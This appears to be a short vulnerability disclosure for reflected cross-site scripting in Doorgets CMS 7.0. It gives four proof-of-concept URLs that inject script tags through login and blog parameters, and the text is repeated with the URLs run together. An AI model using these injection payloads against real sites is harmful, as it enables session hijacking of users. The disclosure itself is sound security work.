The Doorgets CMS 7.0 application was found to be vulnerable to reflected or non-persistent cross-site scripting. The presence of cross-site scripting is due to weak input validation and successful exploitation may lead to user account compromise. An attacker can effectively force users to execute malicious payloads or trick them into clicking links which may allow their sessions to be hijacked.
Multiple instances of XSS were identified:
http://localhost:8081/do/dg-user/?controller=authentification&error-login=true&back=/do/dg-user/%3Fcontroller%3Dinbox%26q_uri_module%3Dcontact"><script>alert('xss')</script>
-
http://localhost:8081/do/dg-user/?action=forget"><script>alert('xss in action')</script>&controller=authentification
-
http://localhost:8081/do/u/doorgets/?blog&apples"><Script>alert("XSS")</Script>pears
http://localhost:8081/do/dg-user/?back="><script>prompt(966953)</script>&controller=authentification
Vendor is aware and working on a fix.
Safe Surfing :)
The Doorgets CMS 7.0 application was found to be vulnerable to reflected or non-persistent cross-site scripting. The presence of cross-site scripting is due to weak input validation and successful exploitation may lead to user account compromise. An attacker can effectively force users to execute malicious payloads or trick them into clicking links which may allow their sessions to be hijacked.
Multiple instances of XSS were identified:
http://localhost:8081/do/dg-user/?controller=authentification&error-login=true&back=/do/dg-user/%3Fcontroller%3Dinbox%26q_uri_module%3Dcontact"><script>alert('xss')</script>http://localhost:8081/do/dg-user/?action=forget"><script>alert('xss in action')</script>&controller=authentificationhttp://localhost:8081/do/u/doorgets/?blog&apples"><Script>alert("XSS")</Script>pearshttp://localhost:8081/do/dg-user/?back="><script>prompt(966953)</script>&controller=authentificationVendor is aware and working on a fix.
Safe Surfing :)